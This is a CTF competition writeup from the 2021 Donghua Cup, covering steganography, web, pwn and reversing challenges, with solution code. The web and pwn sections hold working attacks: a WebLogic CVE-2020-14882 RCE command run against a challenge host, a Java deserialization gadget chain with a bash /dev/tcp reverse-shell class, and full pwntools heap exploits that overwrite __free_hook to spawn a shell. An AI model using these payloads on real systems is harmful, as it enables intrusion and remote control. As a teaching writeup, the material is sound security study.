2021 National College Student Cyber Security Invitational / 7th "Donghua Cup" Shanghai College Student Cyber Security Competition Writeup

Misc

checkin

The challenge gives +AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-
This is UTF-7 (the UTF-16BE code units of the text, base64-encoded between + and -); decoding it gives the flag.
The flag is:
flag{dhb_7th}
project

Download the attachment. After unzipping, it looks like an ICS (industrial control) challenge, but the archive also contains another zip, problem_bak.zip.
Extracting that gives a file named 你来了~
It holds three pieces of data. The first is base64:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6 546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ 6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw 6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ 77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf 5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE 56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7 j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA gg0K
Decoding it gives the following (a Chinese paragraph about 表情包, sticker/emoji culture; it is only the cover text):
表情包文化,是随着网络社交沟通的增多出现的一种主流文化。一个人的表情包是其隐藏起来的真我,一个国家的表情包里能看到这个国家的表情。有时候,表情包表达的是不能道破的真实想法和感受,语言和文字的尽头,就是表情包施展的空间。 表情包是网络语言的一种进化,它的产生和流行与其特定的“生存环境”有关。其追求醒目、新奇、谐谑等效果的特点,与年轻人张扬个性和搞怪的心理相符。 表情包之所以能够大范围地传播,是因为其弥补了文字交流的枯燥和态度表达不准确的弱点,有效地提高了沟通效率。部分表情包具有替代文字的功能,还可以节省打字时间。随着智能手机的全面普及和社交应用软件的大量使用,表情包已经高频率地出现在人们的网络聊天对话当中。
In the decoded output the hidden characters are easy to spot (the base64 contains runs of E2 80 8C / E2 80 8D / E2 80 AC / EF BB BF, i.e. zero-width characters).
Decoding the zero-width characters gives hurryup. This is obviously a key for something later on, but nothing needs it yet, so keep going.
Online zero-width decoder: https://330k.github.io/misc_tools/unicode_steganography.html
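The zero-width decoding above, as an added example (not the writeup's tool): the carrier alphabet is read straight off the decoded bytes of the first base64 section, where the runs are E2 80 8C (U+200C), E2 80 8D (U+200D), E2 80 AC (U+202C) and EF BB BF (U+FEFF), eight of them per hidden character. Treating those four characters as base-4 digits of a 16-bit code unit, most significant digit first, is the scheme that turns the runs into hurryup; the first run from the challenge text is embedded below, and the cover text used for the round trip is constructed.

```python
# Zero-width Unicode steganography, added example (not the writeup's own code).
# Alphabet inferred from the zero-width runs in the decoded base64 above:
# each hidden character is one 16-bit code unit written as eight base-4 digits,
# U+200C = 0, U+200D = 1, U+202C = 2, U+FEFF = 3, most significant digit first.
ZW_ALPHABET = "\u200c\u200d\u202c\ufeff"
DIGITS_PER_CHAR = 8  # 8 base-4 digits = 16 bits


def extract_zero_width(text: str) -> str:
    """Keep only the carrier characters, dropping the visible cover text."""
    return "".join(ch for ch in text if ch in ZW_ALPHABET)


def zw_decode(text: str) -> str:
    """Recover the hidden string; a trailing partial group is ignored."""
    digits = [ZW_ALPHABET.index(ch) for ch in extract_zero_width(text)]
    usable = len(digits) - len(digits) % DIGITS_PER_CHAR
    out = []
    for i in range(0, usable, DIGITS_PER_CHAR):
        value = 0
        for d in digits[i:i + DIGITS_PER_CHAR]:
            value = value * 4 + d
        out.append(chr(value))
    return "".join(out)


def zw_encode(secret: str, cover: str) -> str:
    """Hide `secret` after the first character of `cover` with the same scheme."""
    carrier = []
    for ch in secret:
        value = ord(ch)
        if value > 0xFFFF:
            raise ValueError("scheme carries one UTF-16 code unit per character")
        group = []
        for _ in range(DIGITS_PER_CHAR):
            group.append(ZW_ALPHABET[value % 4])
            value //= 4
        carrier.extend(reversed(group))  # emit most significant digit first
    return cover[:1] + "".join(carrier) + cover[1:]


# The first zero-width run of the challenge text (bytes E2 80 8C x4, E2 80 8D,
# E2 80 AC x2, E2 80 8C), which decodes to the 'h' of hurryup.
CHALLENGE_RUN = "\u200c\u200c\u200c\u200c\u200d\u202c\u202c\u200c"

if __name__ == "__main__":
    print(zw_decode(CHALLENGE_RUN))
    # Constructed cover text for a round trip
    stego = zw_encode("hurryup", "表情包文化")
    print(repr(stego), "->", zw_decode(stego))
```

When the alphabet of a sample is unknown, dump the code points of every non-visible character first (the online tool lets you tick the set it should use); the number of carriers per hidden character, eight here, tells you the bit width.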
The second part announces itself as quoted-printable. Decoding it online gives text that matches the cover text of the first, base64-encoded part.
The third part is described as a JPG image whose bytes are base64-encoded. The base64 has no data URI prefix, so prepend data:image/jpg;base64, yourself and render it to get the picture.
Opening the picture in 010 Editor shows extra data after the JPEG end-of-image marker FF D9.
It turned out to be OurSecret steganography: when you load an image in OurSecret that was not produced by it, no data size is displayed, whereas this image shows a data size, confirming the tool.
The password is hurryup, the string recovered from the zero-width characters in part one.
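The 010 Editor check above, as an added example (not from the writeup): walk the JPEG marker structure to the real end-of-image marker instead of searching for the last FF D9, because the appended data can itself contain that byte pair, in which case a last-occurrence search returns only part of it. The sample JPEG is constructed (valid headers only, not a decodable picture).

```python
import struct


def jpeg_trailing_data(data: bytes) -> bytes:
    """Walk the marker structure to the real End-Of-Image and return what follows."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (no SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: everything after it is foreign
            return data[pos + 2:]
        if marker == 0xFF:                      # fill byte, the marker continues
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len                      # length includes itself, not the marker
        if marker == 0xDA:                      # SOS: entropy-coded data follows
            # Inside scan data FF 00 is a stuffed 0xFF and FF D0..D7 are restart
            # markers; any other FF xx ends the scan.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def naive_trailing_data(data: bytes) -> bytes:
    """What a last-FF-D9 search returns; wrong when the appendix contains FF D9."""
    return data[data.rfind(b"\xff\xd9") + 2:]


# Constructed sample: SOI, APP0, an SOS whose scan data contains a stuffed byte
# and a restart marker, EOI, then an appended payload with a fake EOI inside it.
APPENDED = b"hidden payload \xff\xd9 with a fake EOI inside"
SAMPLE_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + b"\xff\xd9"
    + APPENDED
)

if __name__ == "__main__":
    print(jpeg_trailing_data(SAMPLE_JPEG))
    print(naive_trailing_data(SAMPLE_JPEG))
```

Running it against a real file (`jpeg_trailing_data(open("x.jpg", "rb").read())`) gives the appendix to feed to OurSecret, binwalk or a hex editor; an empty result means nothing is appended and the hiding technique is elsewhere (LSB, EXIF, etc.).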
So the flag is:
flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}
JumpJumpTiger

Opening jump.exe in IDA, main is a hint:

int main(int argc, const char **argv, const char **envp)
{
  int v4[100]; // [rsp+20h] [rbp-60h]
  int v5[101]; // [rsp+1B0h] [rbp+130h]
  int v6; // [rsp+344h] [rbp+2C4h]
  int v7; // [rsp+348h] [rbp+2C8h]
  int i; // [rsp+34Ch] [rbp+2CCh]

  printf("This is your hint!!!");
  v7 = 0;
  v6 = 0;
  for (i = 0; i <= 99; ++i)
  {
    if (i & 1)
      v4[v6++] = i;        // odd indices go to one array
    else
      v5[v7++] = i;        // even indices go to the other
  }
  return 0;
}

In other words: separate the data by odd and even positions.
Looking at the raw bytes of jump.exe, there is a huge amount of what looks like base64; extract it as-is:
/i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT... (about eight million characters in total)

Try the odd/even split directly:

# De-interleave the extracted text: characters at even indices form one
# stream and characters at odd indices the other, as the hint does with 0..99.
with open("in.txt") as f:
    data = f.read().strip()

even = data[0::2]
odd = data[1::2]

with open("out_even.txt", "w") as f:
    f.write(even)
with open("out_odd.txt", "w") as f:
    f.write(odd)

print(len(even), len(odd))

This yields exactly two base64 strings, both ending in = padding:

/9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR... (about four million characters in total)
Decoding them separately gives a JPG and a PNG that look identical (the /9j/ prefix is the JPEG SOI marker in base64). That is a blind watermark; run:
python bwmforpy3.py decode 2.jpg 2.png flag.png
This produces flag.png, which shows the flag when opened.
The flag is:
flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}
Web

apacheprOxy

Opening the target shows it is WebLogic.
WebLogic has CVE-2020-14882, an unauthenticated remote code execution issue in the administration console (the authentication bypass, chained with CVE-2020-14883 for the actual code execution), and there is a ready-made exploit on GitHub.
EXP: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
Because a reverse proxy sits in front, visiting the given address directly lands on the ichunqiu (i春秋) homepage; capture the traffic to find the real address of the challenge instance.
Run:
python 1.py -u "http://47.104.100.25:7410/" -c "ls /"
Then simply cat /flag:
python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"
So the flag is:
flag{da77ef49-5958-40d5-b426-664b8299e576}
EzGadget

Start the audit with IndexController.java:

.....
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021) {
    objectInputStream.readObject();
}
.....

To get past this check, the payload stream has to begin with the same two primitive writes before the serialized object:
oos.writeUTF("gadgets");
oos.writeInt(2021);
and the deserialization goes ahead.
ToStringBean.java:

public String toString() {
    ToStringBean toStringBean = new ToStringBean();
    // defineClass() on attacker-controlled bytes: the static initializer of the
    // loaded class runs on newInstance()
    Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
    Object var3 = null;
    try {
        var3 = clazz.newInstance();
    } catch (InstantiationException var5) {
        var5.printStackTrace();
    } catch (IllegalAccessException var6) {
        var6.printStackTrace();
    }
    return "enjoy it.";
}

So bytecode is loaded, and the loading happens in toString(). In the CommonsCollections5 chain, BadAttributeValueExpException.readObject() calls toString() on its val field; that class ships with the JDK and val is under our control, so no third-party library is needed at all.
import com.ezgame.ctf.tools.ToStringBean;
import ezgame.ctf.bean.User;
import javax.management.BadAttributeValueExpException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;

// Reflections (reflective field access) and Serialize (ObjectOutputStream wrapper)
// are helper classes not reproduced in the writeup.
public class exp {
    public static void main(String[] args) throws Exception {
        // Read the compiled evil.class from the classpath
        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);
        // Plant the bytecode in ToStringBean.ClassByte; toString() will defineClass() it
        ToStringBean sie = new ToStringBean();
        Field bytecodes = Reflections.getField(sie.getClass(), "ClassByte");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(sie, "ClassByte", bytes);
        // BadAttributeValueExpException.readObject() calls val.toString()
        BadAttributeValueExpException exception = new BadAttributeValueExpException("exp");
        Reflections.setFieldValue(exception, "val", sie);
        String a = Serialize.serialize(exception);
        System.out.print(a);
    }
}

The class whose bytecode gets loaded (compiled to evil.class; its static initializer runs when newInstance() is called):

public class evil {
    static {
        try {
            Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
        } catch (Exception e) {
        }
    }
}
Remember the two writes that take the server into the if branch, emitted before writeObject():
writeUTF("gadgets");
writeInt(2021);
The generated payload can be sent as-is; the listener on the VPS then receives the reverse shell.
Pwn

cpp1

glibc 2.31. The bug is in edit, which allows a heap overflow. Fill the tcache bin for 0x80-byte requests first, then overflow a neighbouring chunk's size field so that it overlaps the chunk after it; freeing the enlarged chunk sends it to the unsorted bin, and showing the overlapped chunk leaks libc. After that it is a standard tcache attack: overflow a freed chunk's fd to point at __free_hook, write system there, and free a chunk containing "/bin/sh" for a shell.
Exploit:

from pwn import *
context.log_level = "debug"
io = remote("47.104.143.202", "43359")

def menu(choice):
    io.sendlineafter(">>", str(choice))

def add(index, size):
    menu(1)
    io.sendlineafter(">>", str(index))
    io.sendlineafter(">>", str(size))

def edit(index, content):
    menu(2)
    io.sendlineafter(">>", str(index))
    io.sendlineafter(">>", content)

def show(index):
    menu(3)
    io.sendlineafter(">>", str(index))

def delete(index):
    menu(4)
    io.sendlineafter(">>", str(index))

def look():
    global io
    gdb.attach(io)

# Seven 0x90 chunks to fill that tcache bin later
for i in range(0, 7):
    add(i, 0x80)
add(7, 0x18)
add(8, 0x50)
add(9, 0x20)
add(10, 0x30)
# Overflow from chunk 7 into chunk 8's size: 0x61 -> 0x91, so chunk 8 now also
# covers chunk 9
edit(7, b"a" * 0x10 + p64(0) + b"\x91")
for i in range(0, 7):
    delete(i)
delete(8)                       # tcache full, the 0x90 chunk goes to the unsorted bin
for i in range(0, 7):
    add(i, 0x80)
add(8, 0x50)                    # split from the unsorted chunk; the remainder sits on chunk 9
show(9)                         # chunk 9 now holds the remainder's fd: main_arena+96
info = u64(io.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
malloc_hook = info - 96 - 0x10
libc = ELF("./libc-2.31.so")
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
success("free_hook:" + hex(free_hook))
system = libc_base + libc.sym["system"]

# tcache poisoning: overflow from chunk 13 into freed chunk 14's fd
add(11, 0x20)
add(12, 0x18)
add(13, 0x18)
add(14, 0x18)
delete(12)
delete(14)
edit(13, p64(0) * 3 + p64(0x21) + p64(free_hook))
add(14, 0x18)
add(15, 0x18)                   # served from the poisoned entry: __free_hook
edit(15, p64(system))
edit(14, b"/bin/sh\x00")
delete(14)                      # free(chunk 14) -> system("/bin/sh")
io.interactive()
The flag is:
flag{96f7801e4e658271915cf5ab3aa26ee6}
bg3

Leaking libc: large chunks can be requested, so free a chunk bigger than 0x420 (it goes straight to the unsorted bin), allocate it back and show it to read the main_arena pointer left in it. Getting a shell: the bug is in add, where re-adding the same index accumulates the recorded size, so a later edit overflows; use that to write __free_hook with system.
Exploit:

from pwn import *
context.log_level = "debug"
io = remote("47.104.143.202", "25997")

def menu(choice):
    io.sendlineafter("Select:", str(choice))

def add(index, size):
    menu(1)
    io.sendlineafter("Index:", str(index))
    io.sendlineafter(":", str(size))

def edit(index, content):
    menu(2)
    io.sendlineafter("Index:", str(index))
    io.sendlineafter("BugInfo:", content)

def show(index):
    menu(3)
    io.sendlineafter("Index:", str(index))

def delete(index):
    menu(4)
    io.sendlineafter("Index:", str(index))

def look():
    global io
    gdb.attach(io)

# Leak: a freed 0x430 chunk lands in the unsorted bin; allocating it back leaves
# main_arena+96 in its first 8 bytes
add(0, 0x420)
add(1, 0x18)
delete(0)
add(0, 0x420)
show(0)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so", checksec=0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

# Re-adding index 2 accumulates its recorded size, so edit(2) writes past its chunk
add(2, 0x18)
delete(2)
add(2, 0x18)
delete(2)
add(2, 0x18)
delete(2)
add(2, 0x18)
add(3, 0x18)
add(4, 0x18)
delete(4)
delete(3)
edit(2, p64(0) * 4 + p64(free_hook))   # overwrite freed chunk 3's fd
add(5, 0x18)
add(6, 0x18)                           # -> __free_hook
edit(6, p64(system))
edit(5, b"/bin/sh\x00")
delete(5)
io.interactive()
The flag is:
flag{7240aca686aa4bc4d7697b2d7b5c7655}
gcc2

The bug is in Remove: a use-after-free. Leaking libc: use the UAF to leak a heap address first, then point a tcache fd at the original chunk address + 0x10; when that fake chunk is allocated, writes through it overflow 0x10 bytes down into the next chunk, whose size is changed to 0xe1. Edit that 0xe1 chunk before each free to bypass the tcache double-free check, free it seven times into tcache, then free it once more so it goes to the unsorted bin, and show it to leak libc. Finally a plain tcache attack through the UAF writes __free_hook with system for the shell.

from pwn import *
context.log_level = "debug"
io = remote("47.104.143.202", "15348")

def menu(choice):
    io.sendlineafter(">>", str(choice))

def add(index, size):
    menu(1)
    io.sendlineafter(">>", str(index))
    io.sendlineafter(">>", str(size))

def edit(index, content):
    menu(2)
    io.sendlineafter(">>", str(index))
    io.sendlineafter(">>", content)

def show(index):
    menu(3)
    io.sendlineafter(">>", str(index))

def delete(index):
    menu(4)
    io.sendlineafter(">>", str(index))

def look():
    global io
    gdb.attach(io)

add(0, 0x60)
add(1, 0x60)
add(2, 0x60)
add(3, 0x60)
add(4, 0x18)                     # valid next-chunk header for the later 0xe0 free
delete(1)
edit(1, p64(0) + p64(0x71))      # UAF write: fake 0x71 chunk header at chunk1+0x10
delete(0)                        # tcache 0x70: chunk 0 -> chunk 1
show(0)                          # fd of chunk 0 = heap address of chunk 1's data
io.recvuntil("\n")
chunk_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(chunk_addr))
fake_addr = chunk_addr + 0x10
print(hex(fake_addr))
edit(0, p64(fake_addr))          # poison fd toward the fake chunk
add(5, 0x60)                     # chunk 0 back
add(6, 0x60)                     # fake chunk, 0x10 below chunk 2's header
edit(6, b"a" * 0x58 + b"\xe1")   # chunk 2 size 0x71 -> 0xe1
# Free chunk 2 seven times into the 0xe0 tcache bin, zeroing fd/key each time
# so the double-free check does not fire
for i in range(0, 7):
    edit(2, p64(0) * 2)
    delete(2)
edit(2, p64(0) * 2)
delete(2)                        # eighth free: unsorted bin
show(2)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so", checksec=0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]

# tcache poisoning through the UAF on chunk 10
add(9, 0x18)
add(10, 0x18)
delete(9)
delete(10)
edit(10, p64(free_hook))
add(11, 0x18)
add(12, 0x18)                    # -> __free_hook
edit(12, p64(system))
add(13, 0x18)
edit(13, b"/bin/sh\x00")
delete(13)
io.interactive()
The flag is:
flag{c9749ef8cbfdc4fc56542daea489a71c}
boom_script

This challenge is a small C-like script interpreter; a teammate happened to send me a similar problem not long ago. It has a use-after-free: string reassignments allocate and free heap chunks, and that is used both for the leak and to get a shell.
Exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 from pwn import *context.log_level = "debug" io = remote("47.104.143.202" ,"41299" ) def look (): global io gdb.attach(io) def shell (payload ): io.recvuntil("$" ) io.sendline(str (1 )) io.recvuntil('length:' ) io.sendline(str (len (payload))) io.recvuntil('code:' ) io.send(payload) def main (): payload=""" a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; b=a; a="bbbbbb"; c=0; prints(b); array arr[20]; arr[0]=1193046; arr[1]=1193046; b="asdasd"; a1="cccccccc"; a2="cccccccc"; a3="cccccccc"; a3="cccccccc"; a4="cccccccc"; a5="cccccccc"; a9="cccccccc"; 
tc="sssssssssssssssssssssssssssssssssssssssssssssssss"; a6="sssssssssssssssssssssssssssssssssssssssssssssssss"; a7="/bin/sh"; a8="/bin/sh"; a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; prints("dddddd"); inputn(c); arr[0]=c; arr[1]=c; tc1="sssssssssssssssssssssssssssssssssssssssssssssssss"; array arr1[1]; prints("dddddd"); inputn(c); arr1[0]=c; a7="aaa"; inputn(c); """ shell(payload) libc_base=u64(io.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' ))-0x1ebbe0 libc=ELF('./libc.so.6' ,checksec = 0 ) success("libc_base" +hex (libc_base)) free_hook=libc_base+libc.sym['__free_hook' ] system=libc_base+libc.sym['system' ] success("free_hook:" +hex (free_hook)) success("system:" +hex (system)) io.sendlineafter("dddddd\n" ,str (free_hook-0x28 )) io.sendlineafter("dddddd\n" ,str (system)) io.interactive() if __name__ == '__main__' : main()
The flag is:
flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}
Reverse

ooo

A giveaway; I was just slow on it, sadly.
Do what it shows; as always I took the lazy route and brute-forced it.
The flag is:
flag{13f35663-50a4-477b-278b-b711026ff7ad}
mod

The key to this one is removing the junk instructions. Being lazy, I only cleaned the algorithm section and let IDA's F5 decompile it.
The result is a modified base encoding; rather than analyse the algorithm, I brute-forced it.
The flag is:
flag{5a073724-8223-413d-11fa-d53b133df89e}
Hell's Gate

When I first picked this up I saw lots of 0x100 and got excited thinking it was RC4 (solved, solved!). Out of habit I tried brute-forcing before analysing the algorithm; single-stepping to the point in the figure below, a pointer exception kept being raised, which hinted at exception handling of some kind, and so it was...
Following into the function at 00416F90: the first part looks like anti-debugging (it did not catch my OllyDbg; presumably it checks for windbg or similar), deal with it as you see fit, not worth elaborating. In the algorithm section there were odd constructs like the one in the figure below, in several variants.
retf, as the name says, can load the cs register: cs = 0x23 means 32-bit mode and cs = 0x33 means 64-bit mode, so the code after the far return is 64-bit (the WoW64 "Heaven's Gate" trick). windbg did not seem able to debug it either (I did not dig into why; probably the exceptions). Since each 64-bit call is short, I read the disassembly in Cheat Engine and worked out what each call does; the one in the figure below is just a pointer assignment. After a while it became clear the algorithm is TEA.
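A reference TEA implementation, added here as an example (not the writeup's own script, and the key and data are constructed): once the 64-bit calls are identified as TEA, a decryption like this recovers the input, provided the constants match the binary.

```python
import struct

# Textbook TEA (Wheeler & Needham): 64-bit block, 128-bit key, 32 rounds.
TEA_DELTA = 0x9E3779B9
MASK32 = 0xFFFFFFFF


def tea_encrypt_block(v0, v1, key, rounds=32):
    k0, k1, k2, k3 = key
    s = 0
    for _ in range(rounds):
        s = (s + TEA_DELTA) & MASK32
        v0 = (v0 + (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK32
        v1 = (v1 + (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK32
    return v0, v1


def tea_decrypt_block(v0, v1, key, rounds=32):
    """Run the rounds backwards, starting from the final value of the sum."""
    k0, k1, k2, k3 = key
    s = (TEA_DELTA * rounds) & MASK32
    for _ in range(rounds):
        v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK32
        v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK32
        s = (s - TEA_DELTA) & MASK32
    return v0, v1


def _blocks(data: bytes, key: bytes, rounds: int, endian: str, fn) -> bytes:
    if len(data) % 8 or len(key) != 16:
        raise ValueError("data must be a multiple of 8 bytes and the key 16 bytes")
    k = struct.unpack(endian + "4I", key)
    out = b""
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack(endian + "2I", data[i:i + 8])
        out += struct.pack(endian + "2I", *fn(v0, v1, k, rounds))
    return out


def tea_encrypt(data: bytes, key: bytes, rounds: int = 32, endian: str = "<") -> bytes:
    return _blocks(data, key, rounds, endian, tea_encrypt_block)


def tea_decrypt(data: bytes, key: bytes, rounds: int = 32, endian: str = "<") -> bytes:
    return _blocks(data, key, rounds, endian, tea_decrypt_block)


if __name__ == "__main__":
    # Constructed key and plaintext for a round trip
    key = bytes(range(16))
    pt = b"flag{tea_example"            # 16 bytes = two blocks
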